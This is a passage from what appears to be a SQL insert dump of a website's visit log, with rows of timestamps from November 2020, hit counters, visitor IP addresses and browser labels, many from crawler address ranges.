,(544158,1604203985,1,1,0,0,'46.211.33.62','chrome'),(544159,1604206554,1,1,0,0,'94.153.17.152','chrome'),(544160,1604208615,1,1,0,0,'91.196.178.179','other'),(544161,1604209642,1,1,0,0,'46.211.16.100','other'),(544162,1604210741,1,1,0,0,'178.92.74.3','chrome'),(544163,1604210752,1,1,0,0,'91.196.177.102','chrome'),(544164,1604211654,1,1,0,0,'91.196.178.103','chrome'),(544165,1604212034,1,1,0,0,'91.196.178.29','chrome'),(544166,1604212038,1,0,1,0,'66.249.66.91',''),(544167,1604213239,1,1,0,0,'91.196.178.152','other'),(544168,1604213513,1,1,0,0,'91.196.178.46','chrome'),(544169,1604213607,1,1,0,0,'91.196.178.108','chrome'),(544170,1604213803,1,1,0,0,'173.252.111.4','other'),(544171,1604215433,1,1,0,0,'91.196.178.176','chrome'),(544172,1604215564,1,1,0,0,'92.113.191.53','chrome'),(544173,1604216492,1,1,0,0,'91.196.178.65','chrome'),(544174,1604217061,1,1,0,0,'66.220.149.23','other'),(544175,1604217596,1,1,0,0,'173.252.127.2','other'),(544176,1604217800,1,1,0,0,'31.13.127.17','other'),(544177,1604217812,1,1,0,0,'91.196.178.21','chrome'),(544178,1604217992,1,1,0,0,'31.13.127.12','other'),(544179,1604221565,1,1,0,0,'173.252.83.16','other'),(544180,1604222778,1,1,0,0,'46.211.52.214','chrome'),(544181,1604222825,1,1,0,0,'37.55.59.92','chrome'),(544182,1604223082,1,1,0,0,'91.196.178.21','chrome'),(544183,1604223135,1,1,0,0,'173.252.111.120','other'),(544186,1604223137,1,1,0,0,'173.252.111.111','other'),(544187,1604223139,1,1,0,0,'173.252.111.16','other'),(544188,1604223142,1,1,0,0,'173.252.111.2','other'),(544189,1604223143,1,1,0,0,'173.252.111.20','other'),(544190,1604223371,1,1,0,0,'185.177.215.4','chrome'),(544191,1604223458,1,1,0,0,'173.252.127.15','other'),(544192,1604223914,1,1,0,0,'31.13.127.19','other'),(544193,1604224331,1,1,0,0,'194.44.220.198','chrome'),(544194,1604225079,1,1,0,0,'92.112.124.228','chrome'),(544195,1604225459,1,1,0,0,'94.153.2.140','chrome'),(544196,1604226081,1,1,0,0,'77.83.153.164','chrome'),(544197,1604226808,1,1,0,0,'178.92.8.134','chrome'),(544198,1604227405,1,1,0,0,'193.246.149.142','chrome'),(544199,1604227745,1,1,0,0,'81.190.79.252','chrome'),(544200,1604228833,1,1,0,0,'88.155.14.77','chrome'),(544201,1604229179,1,1,0,0,'31.41.90.247','chrome'),(544202,1604231129,1,1,0,0,'176.227.247.71','chrome'),(544203,1604231139,4,4,0,0,'69.171.249.24','other'),(544204,1604231141,1,1,0,0,'173.252.107.30','other'),(544205,1604231407,1,1,0,0,'173.252.87.13','other'),(544206,1604231568,1,1,0,0,'31.13.103.4','other'),(544207,1604231569,1,1,0,0,'31.13.103.111','other'),(544208,1604231629,1,1,0,0,'91.196.178.178','chrome'),(544209,1604231708,1,1,0,0,'173.252.87.2','other'),(544210,1604232293,1,1,0,0,'178.133.133.176','chrome'),(544211,1604235735,1,1,0,0,'128.124.4.41','chrome'),(544212,1604235992,1,1,0,0,'93.170.116.59','chrome'),(544213,1604236256,1,1,0,0,'173.252.87.5','other'),(544214,1604240510,1,1,0,0,'188.146.230.142','chrome'),(544215,1604241431,1,1,0,0,'37.55.224.132','chrome'),(544216,1604243139,1,1,0,0,'91.196.178.162','chrome'),(544217,1604243269,1,1,0,0,'91.196.178.55','chrome'),(544218,1604244057,1,1,0,0,'173.252.111.16','other'),(544220,1604244058,1,1,0,0,'173.252.87.117','other'),(544221,1604244722,1,1,0,0,'173.252.95.28','other'),(544222,1604244798,1,1,0,0,'91.237.41.142','chrome'),(544223,1604244845,1,1,0,0,'46.211.6.39','chrome'),(544224,1604245638,1,1,0,0,'95.107.235.208','chrome'),(544225,1604248219,1,1,0,0,'69.171.251.23','other'),(544226,1604248331,1,1,0,0,'31.13.127.3','other'),(544227,1604248892,1,1,0,0,'173.252.107.3','other'),(544229,1604248893,1,1,0,0,'173.252.107.11','other'),(544232,1604248979,1,1,0,0,'91.196.178.139','other'),(544233,1604249391,1,1,0,0,'66.220.149.118','other'),(544234,1604249617,1,1,0,0,'91.196.178.19','chrome'),(544235,1604250158,1,1,0,0,'128.124.148.119','chrome'),(544236,1604251863,1,1,0,0,'185.237.217.7','firefox'),(544237,1604252551,1,1,0,0,'31.41.107.102','chrome'),(544238,1604253747,1,1,0,0,'66.220.149.23','other'),(544239,1604253811,1,1,0,0,'88.155.2.167','chrome'),(544240,1604254745,1,1,0,0,'195.80.141.221','chrome'),(544241,1604257180,1,1,0,0,'173.252.87.15','other'),(544242,1604257761,1,1,0,0,'46.107.230.126','chrome'),(544243,1604258834,1,1,0,0,'69.171.251.20','other'),(544244,1604259503,1,1,0,0,'91.196.178.29','other'),(544245,1604259708,1,1,0,0,'173.252.111.23','other'),(544246,1604260369,1,1,0,0,'93.170.115.202','other'),(544247,1604260750,1,1,0,0,'91.196.178.79','chrome'),(544248,1604264875,1,1,0,0,'173.252.111.112','other'),(544250,1604266266,1,1,0,0,'37.52.78.227','chrome'),(544251,1604271696,1,1,0,0,'91.196.177.121','chrome'),(544252,1604277955,1,0,1,0,'66.249.66.92',''),(544253,1604281630,1,0,1,0,'66.249.66.92',''),(544254,1604288695,1,1,0,0,'46.211.69.126','chrome'),(544255,1604290330,1,1,0,0,'173.252.83.5','other'),(544256,1604299800,1,1,0,0,'213.133.167.226','chrome'),(544257,1604300592,1,1,0,0,'66.220.149.11','other'),(544258,1604302759,1,1,0,0,'66.220.149.14','other'),(544259,1604302760,1,1,0,0,'66.220.149.116','other'),(544260,1604303030,1,1,0,0,'31.13.127.23','other'),(544261,1604308469,1,1,0,0,'173.252.95.6','other'),(544262,1604312212,1,1,0,0,'128.124.180.41','chrome'),(544263,1604317235,1,1,0,0,'173.252.87.120','chrome'),(544264,1604317254,1,1,0,0,'173.252.87.116','chrome'),(544265,1604317255,1,1,0,0,'173.252.87.6','chrome'),(544266,1604325952,1,1,0,0,'31.13.127.1','other'),(544267,1604326887,1,1,0,0,'173.252.83.17','other'),(544268,1604326888,1,1,0,0,'173.252.83.9','other'),(544269,1604327866,1,1,0,0,'173.252.95.3','other'),(544270,1604335298,1,1,0,0,'91.196.178.105','chrome'),(544271,1604336634,1,1,0,0,'185.237.217.7','firefox'),(544272,1604336652,1,1,0,0,'91.196.178.102','chrome'),(544273,1604336695,1,1,0,0,'31.13.127.3','other'),(544274,1604336698,1,1,0,0,'31.13.127.14','other'),(544275,1604336796,1,1,0,0,'31.13.127.24','other'),(544276,1604336797,1,1,0,0,'31.13.127.119','other'),(544277,1604336798,1,1,0,0,'31.13.127.5','other'),(544278,1604336941,2,2,0,0,'31.13.127.15','other'),(544279,1604336943,1,1,0,0,'31.13.127.13','other'),(544280,1604336996,1,1,0,0,'91.196.178.21','chrome'),(544281,1604337397,1,1,0,0,'91.196.178.58','chrome'),(544282,1604337841,1,1,0,0,'185.237.217.26','chrome'),(544283,1604339008,1,1,0,0,'188.163.51.23','chrome'),(544284,1604339026,2,2,0,0,'88.155.2.203','chrome'),(544285,1604339858,1,1,0,0,'173.252.95.15','other'),(544286,1604339992,1,1,0,0,'91.196.178.24','chrome'),(544287,1604340730,1,1,0,0,'91.196.178.186','chrome'),(544288,1604340804,1,1,0,0,'193.194.127.147','chrome'),(544289,1604342061,1,1,0,0,'91.196.178.151','chrome'),(544290,1604342242,1,1,0,0,'46.211.41.68','chrome'),(544291,1604342385,1,1,0,0,'91.196.178.142','chrome'),(544292,1604342585,1,1,0,0,'185.237.217.22','chrome'),(544293,1604342609,1,1,0,0,'173.252.107.24','other'),(544294,1604342785,1,1,0,0,'213.226.78.167','chrome'),(544295,1604342801,1,1,0,0,'91.196.178.76','chrome'),(544296,1604342944,1,1,0,0,'173.252.127.38','other'),(544297,1604343240,1,1,0,0,'89.252.56.121','other'),(544298,1604343290,1,1,0,0,'213.108.160.43','chrome'),(544299,1604343316,1,1,0,0,'91.196.121.134','chrome'),(544300,1604343338,1,1,0,0,'46.211.81.144','chrome'),(544301,1604343657,1,1,0,0,'94.153.11.187','chrome'),(544302,1604343743,1,1,0,0,'95.132.57.137','other'),(544303,1604343929,1,1,0,0,'91.196.177.219','other'),(544304,1604344156,1,1,0,0,'37.73.2.41','chrome'),(544305,1604344187,1,1,0,0,'91.196.178.122','chrome'),(544306,1604344710,1,1,0,0,'95.135.213.110','chrome'),(544307,1604345250,1,1,0,0,'91.196.178.103','chrome'),(544308,1604345427,1,1,0,0,'91.196.178.36','other'),(544309,1604345432,1,1,0,0,'91.196.178.26','chrome'),(544310,1604345593,2,2,0,0,'193.194.124.94','firefox'),(544311,1604345762,1,1,0,0,'93.79.118.234','chrome'),(544312,1604345780,1,1,0,0,'91.196.178.169','other'),(544313,1604345905,1,1,0,0,'37.73.6.104','chrome'),(544314,1604345987,1,1,0,0,'213.179.252.178','chrome'),(544315,1604346569,1,1,0,0,'92.112.125.210','other'),(544316,1604346571,1,1,0,0,'37.52.23.86','chrome'),(544317,1604347305,1,1,0,0,'173.252.127.12','other'),(544318,1604347649,1,1,0,0,'95.135.90.9','chrome'),(544319,1604347943,1,1,0,0,'178.92.157.140','chrome'),(544320,1604348162,1,1,0,0,'37.73.107.87','chrome'),(544321,1604348311,1,1,0,0,'91.196.178.59','chrome'),(544322,1604348510,1,1,0,0,'91.196.178.23','chrome'),(544323,1604348649,1,1,0,0,'91.196.178.176','chrome'),(544324,1604348680,1,1,0,0,'173.252.127.32','other'),(544325,1604348869,1,1,0,0,'69.171.251.10','other'),(544326,1604349715,1,1,0,0,'94.153.75.50','chrome'),(544327,1604349749,1,1,0,0,'66.220.149.15','other'),(544328,1604350405,1,1,0,0,'173.252.111.24','other'),(544329,1604354995,2,2,0,0,'37.73.3.40','chrome'),(544330,1604355888,1,1,0,0,'91.196.178.76','chrome'),(544331,1604357323,1,1,0,0,'91.223.88.210','other'),(544332,1604359130,1,1,0,0,'94.153.75.50','chrome'),(544333,1604367754,1,0,1,0,'66.249.66.91',''),(544334,1604377329,1,1,0,0,'91.196.178.76','chrome'),(544335,1604380860,1,1,0,0,'128.124.209.78','chrome'),(544336,1604381229,1,1,0,0,'93.79.118.234','chrome'),(544337,1604384095,1,1,0,0,'37.54.22.229','chrome'),(544338,1604387344,1,1,0,0,'91.196.178.67','chrome'),(544339,1604395276,1,1,0,0,'66.220.149.21','other'),(544340,1604399850,1,1,0,0,'193.107.74.85','chrome'),(544341,1604403132,1,1,0,0,'91.196.178.143','chrome'),(544342,1604403282,2,2,0,0,'31.13.127.21','other'),(544343,1604403284,1,1,0,0,'31.13.127.118','other'),(544344,1604407826,1,1,0,0,'31.13.103.7','other'),(544345,1604409173,1,1,0,0,'91.196.177.73','other'),(544346,1604409196,1,1,0,0,'66.220.149.19','other'),(544347,1604410928,1,1,0,0,'185.237.217.16','chrome'),(544348,1604411660,1,1,0,0,'91.196.178.104','chrome'),(544349,1604411683,1,1,0,0,'173.252.79.14','other'),(544350,1604411684,1,1,0,0,'173.252.79.11','other'),(544351,1604414439,1,1,0,0,'31.13.127.119','other'),(544352,1604414442,1,1,0,0,'31.13.127.19','other'),(544353,1604414445,1,1,0,0,'31.13.127.18','other'),(544354,1604414701,1,1,0,0,'46.133.230.206','chrome'),(544355,1604415576,1,1,0,0,'91.196.178.70','chrome'),(544356,1604415905,1,1,0,0,'91.196.178.21','chrome'),(544357,1604416478,3,3,0,0,'31.13.127.24','other'),(544358,1604416479,1,1,0,0,'31.13.127.2','other'),(544359,1604416481,1,1,0,0,'31.13.127.5','other'),(544360,1604416507,3,3,0,0,'31.13.127.6','other'),(544361,1604416508,1,1,0,0,'31.13.127.9','other'),(544363,1604416509,3,3,0,0,'173.252.95.21','other'),(544366,1604416515,1,1,0,0,'69.171.251.7','other'),(544367,1604416570,1,1,0,0,'173.252.95.16','other'),(544368,1604416572,1,1,0,0,'31.13.127.23','other'),(544369,1604416579,1,1,0,0,'66.220.149.117','other'),(544370,1604416593,1,1,0,0,'91.196.178.177','chrome'),(544371,1604416638,1,1,0,0,'31.13.103.21','other'),(544372,1604416643,1,1,0,0,'173.252.95.118','other'),(544373,1604416655,1,1,0,0,'31.13.127.22','other'),(544375,1604416657,1,1,0,0,'37.73.215.66','chrome'),(544376,1604416665,1,1,0,0,'178.95.246.162','chrome'),(544377,1604416671,1,1,0,0,'31.13.115.113','other'),(544378,1604416679,1,1,0,0,'173.252.127.6','other'),(544379,1604416681,1,1,0,0,'46.211.54.206','chrome'),(544380,1604416684,1,1,0,0,'173.252.127.23','other'),(544382,1604416699,1,1,0,0,'66.220.149.35','other'),(544383,1604416711,1,1,0,0,'173.252.95.111','other'),(544384,1604416724,2,2,0,0,'173.252.95.1','other'),(544385,1604416727,1,1,0,0,'66.220.149.31','other'),(544386,1604416728,1,1,0,0,'66.220.149.116','other'),(544387,1604416730,1,1,0,0,'31.13.127.120','other'),(544388,1604416739,1,1,0,0,'91.196.178.77','chrome'),(544389,1604416746,1,1,0,0,'69.171.251.16','other'),(544390,1604416750,1,1,0,0,'69.171.251.17','other'),(544391,1604416751,3,3,0,0,'31.13.127.14','other'),(544392,1604416757,1,1,0,0,'66.220.149.7','other'),(544393,1604416767,1,1,0,0,'69.171.251.23','other'),(544394,1604416768,1,1,0,0,'173.252.95.27','other'),(544395,1604416811,2,2,0,0,'173.252.95.23','other'),(544396,1604416814,1,1,0,0,'173.252.95.24','other'),(544397,1604416823,1,1,0,0,'173.252.95.3','other'),(544398,1604416845,1,1,0,0,'31.13.115.21','other'),(544399,1604416846,2,2,0,0,'91.196.178.21','chrome'),(544400,1604416849,1,1,0,0,'91.196.178.89','chrome'),(544401,1604416891,1,1,0,0,'69.171.251.116','other'),(544402,1604416892,1,1,0,0,'66.220.149.10','other'),(544403,1604416899,1,1,0,0,'94.153.16.2','chrome'),(544404,1604416901,1,1,0,0,'69.171.251.118','other'),(544406,1604416914,1,1,0,0,'91.196.177.229','chrome'),(544407,1604416918,2,2,0,0,'173.252.95.10','other'),(544408,1604416921,1,1,0,0,'195.10.210.210','chrome'),(544409,1604416951,1,1,0,0,'31.13.115.11','other'),(544410,1604416967,1,1,0,0,'91.196.178.181','chrome'),(544411,1604416972,2,2,0,0,'31.13.127.3','other'),(544412,1604416979,2,2,0,0,'66.220.149.18','other'),(544413,1604417031,2,2,0,0,'173.252.95.5','other'),(544414,1604417043,1,1,0,0,'195.10.210.210','other'),(544415,1604417062,1,1,0,0,'66.220.149.14','other'),(544416,1604417079,1,1,0,0,'173.252.127.27','other'),(544417,1604417083,1,1,0,0,'185.237.217.7','chrome'),(544418,1604417104,1,1,0,0,'69.171.251.12','other'),(544419,1604417126,1,1,0,0,'91.196.178.75','chrome'),(544420,1604417129,1,1,0,0,'91.196.178.157','chrome'),(544421,1604417139,1,1,0,0,'69.171.251.8','other'),(544422,1604417181,1,1,0,0,'91.196.178.76','chrome'),(544423,1604417230,1,1,0,0,'193.169.125.3','chrome'),(544424,1604417258,1,1,0,0,'173.252.95.6','other'),(544425,1604417262,1,1,0,0,'69.171.251.25','other'),(544426,1604417267,1,1,0,0,'31.13.127.17','other'),(544427,1604417274,1,1,0,0,'128.124.141.14','chrome'),(544428,1604417277,1,1,0,0,'128.124.153.220','chrome'),(544429,1604417289,1,1,0,0,'37.73.8.171','chrome'),(544430,1604417303,1,1,0,0,'31.13.103.6','other'),(544431,1604417318,1,1,0,0,'46.211.34.16','other'),(544432,1604417335,1,1,0,0,'31.13.103.112','other'),(544433,1604417388,1,1,0,0,'69.171.251.24','other'),(544434,1604417391,1,1,0,0,'173.252.95.19','other'),(544435,1604417392,1,1,0,0,'173.252.127.1','other'),(544436,1604417394,2,2,0,0,'173.252.95.112','other'),(544437,1604417407,1,1,0,0,'91.196.178.51','other'),(544438,1604417421,1,1,0,0,'91.196.178.106','chrome'),(544439,1604417447,1,1,0,0,'91.196.178.141','chrome'),(544440,1604417459,1,1,0,0,'173.252.95.25','other'),(544441,1604417466,1,1,0,0,'37.73.166.68','chrome'),(544442,1604417478,1,1,0,0,'176.36.240.49','chrome'),(544443,1604417486,1,1,0,0,'178.133.86.169','chrome'),(544444,1604417487,1,1,0,0,'66.220.149.22','other'),(544445,1604417493,2,2,0,0,'66.220.149.8','other'),(544446,1604417516,1,1,0,0,'173.252.95.16','other'),(544447,1604417526,1,1,0,0,'31.13.127.13','other'),(544448,1604417622,2,2,0,0,'173.252.95.26','other'),(544449,1604417631,1,1,0,0,'31.13.127.1','other'),(544450,1604417632,1,1,0,0,'31.13.127.12','other'),(544452,1604417637,1,1,0,0,'31.13.115.15','other'),(544453,1604417651,1,1,0,0,'31.13.103.2','other'),(544454,1604417659,2,2,0,0,'173.252.95.117','other'),(544455,1604417703,1,1,0,0,'31.13.103.15','other'),(544456,1604417710,3,3,0,0,'31.13.127.2','other'),(544457,1604417712,2,2,0,0,'31.13.127.9','other'),(544458,1604417713,1,1,0,0,'91.196.178.178','chrome'),(544459,1604417721,1,1,0,0,'195.10.210.70','chrome'),(544460,1604417731,2,2,0,0,'91.196.178.122','chrome'),(544461,1604417732,1,1,0,0,'66.220.149.15','other'),(544462,1604417741,1,1,0,0,'69.171.251.26','other'),(544463,1604417765,1,1,0,0,'69.171.251.113','other'),(544464,1604417766,1,1,0,0,'92.112.229.131','chrome'),(544465,1604417842,1,1,0,0,'69.171.251.6','other'),(544466,1604417847,1,1,0,0,'46.211.66.213','chrome'),(544467,1604417849,1,1,0,0,'91.196.178.129','chrome'),(544468,1604417854,1,1,0,0,'91.196.178.164','chrome'),(544469,1604417874,3,3,0,0,'173.252.95.11','other'),(544470,1604417878,1,1,0,0,'31.13.127.120','other'),(544471,1604417900,1,1,0,0,'69.171.251.5','other'),(544472,1604417927,1,1,0,0,'173.252.127.113','other'),(544473,1604417949,1,1,0,0,'213.179.252.203','chrome'),(544474,1604417963,1,1,0,0,'95.134.203.36','chrome'),(544475,1604417986,1,1,0,0,'31.13.127.23','other'),(544476,1604417988,1,1,0,0,'91.196.178.189','chrome'),(544477,1604418012,1,1,0,0,'66.220.149.21','other'),(544478,1604418024,2,2,0,0,'173.252.95.27','other'),(544479,1604418029,1,1,0,0,'69.171.251.1','other'),(544480,1604418040,1,1,0,0,'91.196.178.61','chrome'),(544481,1604418051,1,1,0,0,'173.252.95.13','other'),(544482,1604418053,1,1,0,0,'31.13.115.19','other'),(544483,1604418058,1,1,0,0,'66.220.149.33','other'),(544484,1604418063,1,1,0,0,'31.13.103.24','other'),(544485,1604418066,1,1,0,0,'66.220.149.113','other'),(544486,1604418123,1,1,0,0,'91.196.178.130','chrome'),(544487,1604418146,2,2,0,0,'66.220.149.118','other'),(544488,1604418158,2,2,0,0,'173.252.95.7','other'),(544489,1604418184,1,1,0,0,'173.252.95.18','other'),(544490,1604418190,1,1,0,0,'66.220.149.6','other'),(544491,1604418225,1,1,0,0,'91.196.178.21','chrome'),(544492,1604418255,1,1,0,0,'69.171.251.111','other'),(544493,1604418264,1,1,0,0,'173.252.95.2','other'),(544494,1604418275,1,1,0,0,'94.153.74.185','chrome'),(544495,1604418280,1,1,0,0,'173.252.127.111','other'),(544496,1604418285,1,1,0,0,'94.153.6.242','chrome'),(544497,1604418292,1,1,0,0,'69.171.251.4','other'),(544498,1604418351,1,1,0,0,'173.252.95.4','other'),(544499,1604418366,2,2,0,0,'173.252.95.5','other'),(544500,1604418374,1,1,0,0,'91.196.178.10','chrome'),(544501,1604418443,1,1,0,0,'31.13.127.15','other'),(544502,1604418489,1,1,0,0,'173.252.95.111','other'),(544503,1604418503,1,1,0,0,'66.220.149.116','other'),(544504,1604418515,1,1,0,0,'173.252.95.1','other'),(544505,1604418517,1,1,0,0,'173.252.95.28','other'),(544506,1604418523,2,2,0,0,'173.252.95.15','other'),(544507,1604418529,1,1,0,0,'69.171.251.8','other'),(544508,1604418579,1,1,0,0,'95.132.5.39','chrome'),(544509,1604418584,1,1,0,0,'91.196.178.162','chrome'),(544510,1604418596,1,1,0,0,'173.252.95.16','other'),(544512,1604418604,1,1,0,0,'173.252.127.33','other'),(544513,1604418609,1,1,0,0,'91.196.122.190','chrome'),(544514,1604418612,1,1,0,0,'31.13.115.118','other'),(544515,1604418647,1,1,0,0,'31.13.127.116','other'),(544516,1604418651,1,1,0,0,'31.13.115.8','other'),(544517,1604418658,1,1,0,0,'31.13.127.113','other'),(544519,1604418676,1,1,0,0,'69.171.251.15','other'),(544520,1604418690,1,1,0,0,'94.153.48.252','chrome'),(544521,1604418767,1,1,0,0,'66.220.149.25','other'),(544522,1604418792,1,1,0,0,'173.252.95.113','other'),(544523,1604418815,1,1,0,0,'66.220.149.22','other'),(544524,1604418818,1,1,0,0,'66.220.149.27','other'),(544525,1604418826,1,1,0,0,'91.196.178.55','chrome'),(544526,1604418829,1,1,0,0,'188.163.32.228','chrome'),(544527,1604418870,1,1,0,0,'173.252.127.2','other'),(544528,1604418895,1,1,0,0,'66.220.149.15','other'),(544529,1604418907,1,1,0,0,'69.171.251.13','other'),(544530,1604418923,1,1,0,0,'31.13.103.2','other'),(544531,1604418957,1,1,0,0,'173.252.95.9','other'),(544532,1604418973,1,1,0,0,'173.252.95.23','other'),(544533,1604418975,1,1,0,0,'173.252.127.5','other'),(544534,1604419003,1,1,0,0,'66.220.149.5','other'),(544535,1604419044,1,1,0,0,'46.211.48.249','chrome'),(544536,1604419049,2,2,0,0,'173.252.127.112','other'),(544537,1604419071,1,1,0,0,'93.72.15.24','other'),(544538,1604419084,1,1,0,0,'173.252.95.25','other'),(544539,1604419199,1,1,0,0,'173.252.95.117','other'),(544540,1604419202,1,1,0,0,'31.13.127.2','other'),(544541,1604419220,1,1,0,0,'31.13.127.21','other'),(544542,1604419221,3,3,0,0,'173.252.95.14','other'),(544543,1604419235,1,1,0,0,'173.252.95.21','other'),(544544,1604419244,1,1,0,0,'173.252.127.32','other'),(544545,1604419284,1,1,0,0,'91.196.178.21','chrome'),(544546,1604419286,1,1,0,0,'193.108.51.254','other'),(544547,1604419308,1,1,0,0,'91.196.178.188','chrome'),(544548,1604419351,1,1,0,0,'173.252.95.11','other'),(544549,1604419383,2,2,0,0,'173.252.95.22','other'),(544550,1604419405,2,2,0,0,'66.220.149.120','other'),(544551,1604419432,1,1,0,0,'31.13.127.6','other'),(544552,1604419480,1,1,0,0,'31.13.127.112','other'),(544553,1604419507,1,1,0,0,'69.171.251.22','other'),(544554,1604419530,2,2,0,0,'69.171.251.2','other'),(544555,1604419534,1,1,0,0,'69.171.251.120','other'),(544556,1604419551,1,1,0,0,'173.252.95.7','other'),(544557,1604419554,1,1,0,0,'66.220.149.16','other'),(544558,1604419594,1,1,0,0,'66.220.149.37','other'),(544559,1604419645,1,1,0,0,'95.134.168.45','chrome'),(544560,1604419676,2,2,0,0,'31.13.127.14','other'),(544561,1604419688,1,1,0,0,'173.252.127.15','other'),(544562,1604419689,1,1,0,0,'66.220.149.20','other'),(544563,1604419692,1,1,0,0,'31.13.115.6','other'),(544564,1604419730,1,1,0,0,'69.171.251.20','other'),(544565,1604419815,1,1,0,0,'173.252.95.118','other'),(544566,1604419851,1,1,0,0,'173.252.127.9','other'),(544567,1604419861,1,1,0,0,'173.252.127.26','other'),(544568,1604419905,1,1,0,0,'66.220.149.6','other'),(544569,1604419908,2,2,0,0,'173.252.95.9','other'),(544570,1604419913,1,1,0,0,'173.252.95.24','other'),(544571,1604419954,1,1,0,0,'173.252.95.12','other'),(544572,1604419963,1,1,0,0,'91.196.178.40','chrome'),(544573,1604419972,1,1,0,0,'37.73.108.147','chrome'),(544574,1604420089,1,1,0,0,'31.13.127.1','other'),(544575,1604420097,1,1,0,0,'195.10.210.70','chrome'),(544576,1604420117,1,1,0,0,'46.133.230.206','chrome'),(544577,1604420177,1,1,0,0,'69.171.251.8','other'),(544578,1604420200,1,1,0,0,'173.252.95.28','other'),(544579,1604420257,1,1,0,0,'173.252.95.17','other'),(544580,1604420342,1,1,0,0,'66.220.149.23','other'),(544581,1604420354,1,1,0,0,'91.196.178.130','other'),(544582,1604420358,1,1,0,0,'66.220.149.3','other'),(544583,1604420363,1,1,0,0,'66.220.149.8','other'),(544584,1604420517,1,1,0,0,'91.196.178.21','chrome'),(544585,1604420545,1,1,0,0,'66.220.149.32','other'),(544586,1604420554,1,1,0,0,'173.252.95.21','other'),(544587,1604420584,1,1,0,0,'31.13.115.11','other'),(544588,1604420607,1,1,0,0,'173.252.95.29','other'),(544589,1604420613,1,1,0,0,'31.13.115.18','other'),(544590,1604420647,1,1,0,0,'173.252.127.17','other'),(544591,1604420661,1,1,0,0,'173.252.95.11','other'),(544592,1604420664,1,1,0,0,'69.171.251.4','other'),(544593,1604420707,2,2,0,0,'173.252.95.1','other'),(544594,1604420719,1,1,0,0,'173.252.95.22','other'),(544595,1604420724,1,1,0,0,'46.211.11.146','chrome'),(544596,1604420739,1,1,0,0,'31.13.127.17','other'),(544597,1604420767,2,2,0,0,'195.10.210.210','chrome'),(544598,1604420790,1,1,0,0,'66.220.149.19','other'),(544599,1604420796,1,1,0,0,'173.252.95.116','other'),(544600,1604420801,1,1,0,0,'31.13.127.24','other'),(544601,1604420811,1,1,0,0,'66.220.149.11','other'),(544602,1604420891,1,1,0,0,'31.13.127.12','other'),(544603,1604420919,1,1,0,0,'95.134.168.45','chrome'),(544604,1604420956,1,1,0,0,'173.252.95.119','other'),(544605,1604420960,1,1,0,0,'173.252.127.21','other'),(544606,1604420962,1,1,0,0,'69.171.251.12','other'),(544607,1604421008,1,1,0,0,'66.220.149.117','other'),(544608,1604421033,1,1,0,0,'69.171.251.118','other'),(544609,1604421045,1,1,0,0,'31.13.115.119','other'),(544610,1604421137,1,1,0,0,'66.220.149.24','other'),(544611,1604421148,1,1,0,0,'173.252.127.23','other'),(544612,1604421171,1,1,0,0,'173.252.95.27','other'),(544613,1604421188,1,1,0,0,'88.155.35.204','other'),(544614,1604421237,1,1,0,0,'173.252.95.6','other'),(544615,1604421243,1,1,0,0,'37.73.190.158','chrome'),(544616,1604421258,1,1,0,0,'31.13.115.20','other'),(544617,1604421312,1,1,0,0,'31.13.127.119','other'),(544618,1604421323,2,2,0,0,'69.171.251.119','other'),(544619,1604421429,1,1,0,0,'173.252.127.18','other'),(544620,1604421462,1,1,0,0,'173.252.95.7','other'),(544621,1604421511,2,2,0,0,'173.252.95.16','other'),(544622,1604421532,1,1,0,0,'66.220.149.116','other'),(544623,1604421539,1,1,0,0,'173.252.95.18','other'),(544624,1604421553,1,1,0,0,'69.171.251.2','other'),(544625,1604421591,1,1,0,0,'31.13.127.16','other'),(544626,1604421621,1,1,0,0,'69.171.251.1','other'),(544627,1604421682,3,3,0,0,'31.13.127.15','other'),(544628,1604421688,1,1,0,0,'173.252.95.15','other'),(544629,1604421703,1,1,0,0,'31.13.127.13','other'),(544630,1604421716,1,1,0,0,'185.237.217.18','chrome'),(544631,1604421752,1,1,0,0,'91.196.178.38','chrome'),(544632,1604421764,1,1,0,0,'91.196.178.154','chrome'),(544633,1604421800,1,1,0,0,'91.196.178.108','chrome'),(544634,1604421814,1,1,0,0,'31.13.115.11','other'),(544635,1604421824,1,1,0,0,'66.220.149.31','other'),(544636,1604421889,1,1,0,0,'69.171.251.12','other'),(544637,1604421903,1,1,0,0,'91.196.178.67','chrome'),(544638,1604421907,1,1,0,0,'91.196.178.15','chrome'),(544639,1604421957,1,1,0,0,'173.252.95.5','other'),(544640,1604422037,1,1,0,0,'66.220.149.11','other'),(544641,1604422189,1,1,0,0,'173.252.95.118','other'),(544642,1604422231,1,1,0,0,'173.252.95.22','other'),(544643,1604422246,1,1,0,0,'69.171.251.29','other'),(544644,1604422260,1,1,0,0,'66.220.149.18','other'),(544645,1604422279,1,1,0,0,'66.220.149.5','other'),(544646,1604422292,1,1,0,0,'31.13.115.3','other'),(544647,1604422349,1,1,0,0,'91.196.178.21','chrome'),(544648,1604422364,1,1,0,0,'46.211.4.131','chrome'),(544649,1604422365,1,1,0,0,'69.171.251.3','other'),(544650,1604422488,1,1,0,0,'173.252.95.28','other'),(544651,1604422506,1,1,0,0,'66.220.149.33','other'),(544652,1604422560,2,2,0,0,'66.220.149.20','other'),(544653,1604422566,1,1,0,0,'173.252.127.24','other'),(544654,1604422661,1,1,0,0,'195.10.210.70','chrome'),(544655,1604422696,1,1,0,0,'173.252.95.1','other'),(544656,1604422733,1,1,0,0,'46.211.6.64','other'),(544657,1604422748,1,1,0,0,'69.171.251.13','other'),(544658,1604422843,1,1,0,0,'66.220.149.15','other'),(544659,1604422851,1,1,0,0,'173.252.127.34','other'),(544660,1604422880,1,1,0,0,'173.252.95.21','other'),(544661,1604422883,1,1,0,0,'31.13.127.1','other'),(544662,1604422884,1,1,0,0,'173.252.95.16','other'),(544663,1604422944,1,1,0,0,'31.13.115.118','other'),(544664,1604422992,1,1,0,0,'31.13.127.12','other'),(544665,1604423006,1,1,0,0,'173.252.95.15','other'),(544666,1604423182,1,1,0,0,'46.211.8.238','chrome'),(544667,1604423183,1,1,0,0,'173.252.127.120','other'),(544668,1604423191,1,1,0,0,'173.252.95.25','other'),(544669,1604423218,1,1,0,0,'69.171.251.8','other'),(544670,1604423275,1,1,0,0,'195.10.210.210','chrome'),(544671,1604423278,1,1,0,0,'66.220.149.37','other'),(544672,1604423282,1,1,0,0,'130.180.210.245','chrome'),(544673,1604423346,1,1,0,0,'69.171.251.16','other'),(544674,1604423357,1,1,0,0,'173.252.95.27','other'),(544675,1604423399,1,1,0,0,'69.171.251.2','other'),(544676,1604423418,1,1,0,0,'173.252.95.120','other'),(544677,1604423492,1,1,0,0,'185.237.217.18','chrome'),(544678,1604423519,1,1,0,0,'46.211.74.135','chrome'),